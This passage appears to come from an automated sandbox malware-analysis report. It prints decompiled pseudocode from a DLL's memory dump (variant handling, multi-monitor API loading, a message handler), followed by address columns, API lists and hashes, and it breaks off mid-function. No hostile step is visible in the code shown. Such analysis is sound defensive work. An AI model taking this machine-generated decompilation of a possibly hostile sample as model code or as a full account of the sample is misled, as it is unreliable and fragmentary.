						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t291 = _t194 * _t290 >> 0x20;
					_t297 = E100144EC(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10030030(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1002E08D))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E1002CA61(_t300 - 0x34, _t299, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E1002CE83(_t300 - 0x68, _t291, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10014517(_t258, _t291, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1002E03D))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E100200B9(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E100012C0(__ecx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E100201BD(__ecx);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

































                                                                                                                    0x1002db49
                                                                                                                    0x1002db50
                                                                                                                    0x1002db55
                                                                                                                    0x1002db58
                                                                                                                    0x1002db5c
                                                                                                                    0x1002e035
                                                                                                                    0x1002e03a
                                                                                                                    0x1002e03a
                                                                                                                    0x1002db62
                                                                                                                    0x1002db65
                                                                                                                    0x1002db68
                                                                                                                    0x1002db6b
                                                                                                                    0x1002db75
                                                                                                                    0x1002db78
                                                                                                                    0x1002db7d
                                                                                                                    0x1002db83
                                                                                                                    0x1002db8e
                                                                                                                    0x1002db8e
                                                                                                                    0x1002db95
                                                                                                                    0x1002db9c
                                                                                                                    0x1002dba1
                                                                                                                    0x1002dba8
                                                                                                                    0x1002dba8
                                                                                                                    0x1002dbab
                                                                                                                    0x1002dbb2
                                                                                                                    0x1002dbb5
                                                                                                                    0x1002dbb8
                                                                                                                    0x1002dbbb
                                                                                                                    0x1002dbbe
                                                                                                                    0x1002dbc1
                                                                                                                    0x1002dbc5
                                                                                                                    0x1002dbc9
                                                                                                                    0x1002dbca
                                                                                                                    0x1002ddea
                                                                                                                    0x1002ddee
                                                                                                                    0x1002ddf0
                                                                                                                    0x1002ddf9
                                                                                                                    0x1002ddfb
                                                                                                                    0x1002ddfb
                                                                                                                    0x1002de08
                                                                                                                    0x1002de10
                                                                                                                    0x1002de12
                                                                                                                    0x1002de27
                                                                                                                    0x1002de3e
                                                                                                                    0x1002de41
                                                                                                                    0x1002de46
                                                                                                                    0x1002de4b
                                                                                                                    0x1002de76
                                                                                                                    0x1002de76
                                                                                                                    0x1002de79
                                                                                                                    0x1002de82
                                                                                                                    0x1002de85
                                                                                                                    0x1002df5a
                                                                                                                    0x1002df5a
                                                                                                                    0x1002df60
                                                                                                                    0x1002e017
                                                                                                                    0x1002e01a
                                                                                                                    0x1002e01e
                                                                                                                    0x1002e023
                                                                                                                    0x1002e027
                                                                                                                    0x1002e02a
                                                                                                                    0x1002e02c
                                                                                                                    0x1002e02f
                                                                                                                    0x1002e034
                                                                                                                    0x00000000
                                                                                                                    0x1002e02a
                                                                                                                    0x1002df6a
                                                                                                                    0x1002df8f
                                                                                                                    0x1002df92
                                                                                                                    0x1002df95
                                                                                                                    0x1002df98
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002df9a
                                                                                                                    0x00000000
                                                                                                                    0x1002dfab
                                                                                                                    0x1002dfb2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002e00f
                                                                                                                    0x1002e012
                                                                                                                    0x1002e015
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dfca
                                                                                                                    0x1002dfcd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dfd4
                                                                                                                    0x1002dfd7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dfb7
                                                                                                                    0x1002dfba
                                                                                                                    0x1002dfbd
                                                                                                                    0x1002dfbf
                                                                                                                    0x1002dfc2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dfe1
                                                                                                                    0x1002dfe6
                                                                                                                    0x1002dfe9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dff1
                                                                                                                    0x1002dff4
                                                                                                                    0x1002dff6
                                                                                                                    0x1002dffa
                                                                                                                    0x1002dffd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002e001
                                                                                                                    0x1002e004
                                                                                                                    0x1002e007
                                                                                                                    0x1002e008
                                                                                                                    0x1002e009
                                                                                                                    0x1002e00a
                                                                                                                    0x1002e00b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dfa7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002df9a
                                                                                                                    0x1002df6e
                                                                                                                    0x1002df73
                                                                                                                    0x1002df79
                                                                                                                    0x1002df7b
                                                                                                                    0x1002df7d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002df83
                                                                                                                    0x1002df89
                                                                                                                    0x1002dea1
                                                                                                                    0x1002dea1
                                                                                                                    0x1002dea6
                                                                                                                    0x1002dea6
                                                                                                                    0x1002dea9
                                                                                                                    0x1002deb2
                                                                                                                    0x1002deb2
                                                                                                                    0x1002deb7
                                                                                                                    0x1002debd
                                                                                                                    0x1002dec0
                                                                                                                    0x1002dec2
                                                                                                                    0x1002dec6
                                                                                                                    0x1002dec8
                                                                                                                    0x1002ded0
                                                                                                                    0x1002ded1
                                                                                                                    0x1002ded7
                                                                                                                    0x1002ded7
                                                                                                                    0x1002ded9
                                                                                                                    0x1002dedf
                                                                                                                    0x1002dee5
                                                                                                                    0x1002deed
                                                                                                                    0x1002def5
                                                                                                                    0x1002def8
                                                                                                                    0x1002def8
                                                                                                                    0x1002df03
                                                                                                                    0x1002df09
                                                                                                                    0x1002df0b
                                                                                                                    0x1002df12
                                                                                                                    0x1002df17
                                                                                                                    0x1002df1a
                                                                                                                    0x1002df1a
                                                                                                                    0x1002df22
                                                                                                                    0x1002df24
                                                                                                                    0x1002df2b
                                                                                                                    0x1002df30
                                                                                                                    0x1002df33
                                                                                                                    0x1002df33
                                                                                                                    0x1002df3b
                                                                                                                    0x1002df40
                                                                                                                    0x1002df46
                                                                                                                    0x1002df52
                                                                                                                    0x1002df55
                                                                                                                    0x00000000
                                                                                                                    0x1002df55
                                                                                                                    0x1002de8f
                                                                                                                    0x1002de95
                                                                                                                    0x1002de9c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002de9e
                                                                                                                    0x00000000
                                                                                                                    0x1002de4d
                                                                                                                    0x1002de50
                                                                                                                    0x1002de56
                                                                                                                    0x1002de71
                                                                                                                    0x1002de71
                                                                                                                    0x1002de74
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002de5c
                                                                                                                    0x1002de5e
                                                                                                                    0x1002de60
                                                                                                                    0x1002de66
                                                                                                                    0x1002de67
                                                                                                                    0x1002de6d
                                                                                                                    0x1002de6d
                                                                                                                    0x1002de70
                                                                                                                    0x1002de70
                                                                                                                    0x00000000
                                                                                                                    0x1002de70
                                                                                                                    0x1002de62
                                                                                                                    0x1002de64
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002de64
                                                                                                                    0x00000000
                                                                                                                    0x1002de71
                                                                                                                    0x1002dbd0
                                                                                                                    0x1002dbd4
                                                                                                                    0x1002dbd5
                                                                                                                    0x1002dbe4
                                                                                                                    0x1002dbef
                                                                                                                    0x1002dbf2
                                                                                                                    0x1002dbfa
                                                                                                                    0x1002dbfd
                                                                                                                    0x1002dc00
                                                                                                                    0x1002dc06
                                                                                                                    0x1002dc06
                                                                                                                    0x1002dc0a
                                                                                                                    0x1002dc0d
                                                                                                                    0x1002dc10
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dc16
                                                                                                                    0x1002dc1b
                                                                                                                    0x1002dc1e
                                                                                                                    0x1002dc24
                                                                                                                    0x1002dc27
                                                                                                                    0x1002dc2a
                                                                                                                    0x1002dc2d
                                                                                                                    0x1002dc33
                                                                                                                    0x1002dc36
                                                                                                                    0x1002dc39
                                                                                                                    0x1002dc43
                                                                                                                    0x1002dc43
                                                                                                                    0x1002dc46
                                                                                                                    0x1002dc4e
                                                                                                                    0x1002dc50
                                                                                                                    0x1002dd6d
                                                                                                                    0x1002dd72
                                                                                                                    0x1002dd75
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dd77
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dd7e
                                                                                                                    0x1002dd81
                                                                                                                    0x1002dd83
                                                                                                                    0x1002dd89
                                                                                                                    0x1002dd93
                                                                                                                    0x1002dd9a
                                                                                                                    0x1002dd9c
                                                                                                                    0x1002dda8
                                                                                                                    0x1002ddac
                                                                                                                    0x1002ddb1
                                                                                                                    0x1002ddb5
                                                                                                                    0x1002ddb9
                                                                                                                    0x1002ddbb
                                                                                                                    0x1002ddbe
                                                                                                                    0x1002ddc3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dc56
                                                                                                                    0x1002dc56
                                                                                                                    0x1002ddc6
                                                                                                                    0x1002ddc6
                                                                                                                    0x1002ddc9
                                                                                                                    0x1002ddc9
                                                                                                                    0x1002ddcd
                                                                                                                    0x00000000
                                                                                                                    0x1002ddcd
                                                                                                                    0x1002dc5d
                                                                                                                    0x1002dc61
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dc67
                                                                                                                    0x00000000
                                                                                                                    0x1002dc7c
                                                                                                                    0x1002dc7f
                                                                                                                    0x1002dc81
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dca4
                                                                                                                    0x1002dca8
                                                                                                                    0x1002dcad
                                                                                                                    0x1002dcb0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dcb7
                                                                                                                    0x1002dcbb
                                                                                                                    0x1002dcc0
                                                                                                                    0x1002dcc3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dcca
                                                                                                                    0x1002dccd
                                                                                                                    0x1002dccf
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dcd3
                                                                                                                    0x1002dcd6
                                                                                                                    0x1002dcd8
                                                                                                                    0x1002dcda
                                                                                                                    0x1002dcdb
                                                                                                                    0x1002dcde
                                                                                                                    0x1002dce4
                                                                                                                    0x1002dce8
                                                                                                                    0x1002dcea
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dcf0
                                                                                                                    0x1002dcf2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dd45
                                                                                                                    0x1002dd48
                                                                                                                    0x1002dd4c
                                                                                                                    0x1002dd4e
                                                                                                                    0x1002dd50
                                                                                                                    0x1002dd50
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dd55
                                                                                                                    0x1002dd59
                                                                                                                    0x1002dd5c
                                                                                                                    0x1002dd5f
                                                                                                                    0x1002dd61
                                                                                                                    0x1002dd62
                                                                                                                    0x1002dd63
                                                                                                                    0x1002dd64
                                                                                                                    0x1002dd65
                                                                                                                    0x1002dd68
                                                                                                                    0x1002dd6a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dcfd
                                                                                                                    0x1002dcfd
                                                                                                                    0x1002dd00
                                                                                                                    0x1002dd02
                                                                                                                    0x1002dd04
                                                                                                                    0x1002dd05
                                                                                                                    0x1002dd08
                                                                                                                    0x1002dd0b
                                                                                                                    0x1002dd10
                                                                                                                    0x1002dd13
                                                                                                                    0x1002dd17
                                                                                                                    0x1002dd1d
                                                                                                                    0x1002dd21
                                                                                                                    0x1002dd23
                                                                                                                    0x1002dd29
                                                                                                                    0x1002dd29
                                                                                                                    0x1002dd2c
                                                                                                                    0x1002dd2f
                                                                                                                    0x1002dd32
                                                                                                                    0x1002dd37
                                                                                                                    0x1002dd3b
                                                                                                                    0x00000000
                                                                                                                    0x1002dd3b
                                                                                                                    0x1002dd25
                                                                                                                    0x1002dd27
                                                                                                                    0x1002dcf8
                                                                                                                    0x1002dcf8
                                                                                                                    0x00000000
                                                                                                                    0x1002dcf8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dc6e
                                                                                                                    0x1002dc71
                                                                                                                    0x1002dc75
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dc89
                                                                                                                    0x1002dc8c
                                                                                                                    0x1002dc8f
                                                                                                                    0x1002dc92
                                                                                                                    0x1002dc92
                                                                                                                    0x1002dc95
                                                                                                                    0x1002dc95
                                                                                                                    0x1002dc97
                                                                                                                    0x1002dc9c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x1002dc67
                                                                                                                    0x1002ddcf
                                                                                                                    0x1002ddcf
                                                                                                                    0x1002ddd3
                                                                                                                    0x1002ddd6
                                                                                                                    0x1002dddf
                                                                                                                    0x1002dddf
                                                                                                                    0x1002dde8
                                                                                                                    0x00000000
                                                                                                                    0x1002dde8

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4128688680-0
                                                                                                                    • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                    • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                    • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                    • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10018B59 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E10018B59() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100572e4; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x100572e8 = E10018B01(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x100572c8 = 0;
						 *0x100572cc = 0;
						 *0x100572d0 = 0;
						 *0x100572d4 = 0;
						 *0x100572d8 = 0;
						 *0x100572dc = 0;
						 *0x100572e0 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x100572c8 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x100572cc = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x100572d0 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x100572d4 = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x100572dc = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x100572d8 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x100572e0 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x100572e4 = 1;
					return _t5;
				} else {
					_t24 =  *0x100572d8; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

















                                                                                                                    0x10018b5c
                                                                                                                    0x10018b62
                                                                                                                    0x10018b71
                                                                                                                    0x10018b7d
                                                                                                                    0x10018b88
                                                                                                                    0x10018b8a
                                                                                                                    0x10018b8c
                                                                                                                    0x10018c20
                                                                                                                    0x10018c20
                                                                                                                    0x10018c26
                                                                                                                    0x10018c2c
                                                                                                                    0x10018c32
                                                                                                                    0x10018c38
                                                                                                                    0x10018c3e
                                                                                                                    0x10018c44
                                                                                                                    0x10018c4a
                                                                                                                    0x10018b92
                                                                                                                    0x10018b9e
                                                                                                                    0x10018ba0
                                                                                                                    0x10018ba2
                                                                                                                    0x10018ba7
                                                                                                                    0x00000000
                                                                                                                    0x10018ba9
                                                                                                                    0x10018baf
                                                                                                                    0x10018bb1
                                                                                                                    0x10018bb3
                                                                                                                    0x10018bb8
                                                                                                                    0x00000000
                                                                                                                    0x10018bba
                                                                                                                    0x10018bc0
                                                                                                                    0x10018bc2
                                                                                                                    0x10018bc4
                                                                                                                    0x10018bc9
                                                                                                                    0x00000000
                                                                                                                    0x10018bcb
                                                                                                                    0x10018bd1
                                                                                                                    0x10018bd3
                                                                                                                    0x10018bd5
                                                                                                                    0x10018bda
                                                                                                                    0x00000000
                                                                                                                    0x10018bdc
                                                                                                                    0x10018be2
                                                                                                                    0x10018be4
                                                                                                                    0x10018be6
                                                                                                                    0x10018beb
                                                                                                                    0x00000000
                                                                                                                    0x10018bed
                                                                                                                    0x10018bf3
                                                                                                                    0x10018bf5
                                                                                                                    0x10018bf7
                                                                                                                    0x10018bfc
                                                                                                                    0x00000000
                                                                                                                    0x10018bfe
                                                                                                                    0x10018c04
                                                                                                                    0x10018c06
                                                                                                                    0x10018c08
                                                                                                                    0x10018c0d
                                                                                                                    0x00000000
                                                                                                                    0x10018c0f
                                                                                                                    0x10018c11
                                                                                                                    0x10018c11
                                                                                                                    0x10018c11
                                                                                                                    0x10018c0d
                                                                                                                    0x10018bfc
                                                                                                                    0x10018beb
                                                                                                                    0x10018bda
                                                                                                                    0x10018bc9
                                                                                                                    0x10018bb8
                                                                                                                    0x10018ba7
                                                                                                                    0x10018c14
                                                                                                                    0x10018c1f
                                                                                                                    0x10018b64
                                                                                                                    0x10018b66
                                                                                                                    0x10018b70
                                                                                                                    0x10018b70

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                    • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                    • API String ID: 667068680-68207542
                                                                                                                    • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                    • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                    • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                    • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1002A778 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E1002A778(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
